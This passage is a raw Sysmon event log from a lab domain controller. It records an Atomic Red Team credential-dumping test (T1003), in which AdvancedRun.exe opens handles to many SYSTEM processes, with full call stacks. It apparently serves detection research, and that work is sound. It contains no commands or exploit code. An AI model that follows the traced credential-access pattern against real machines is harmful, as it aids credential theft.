dows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003942569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003942568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 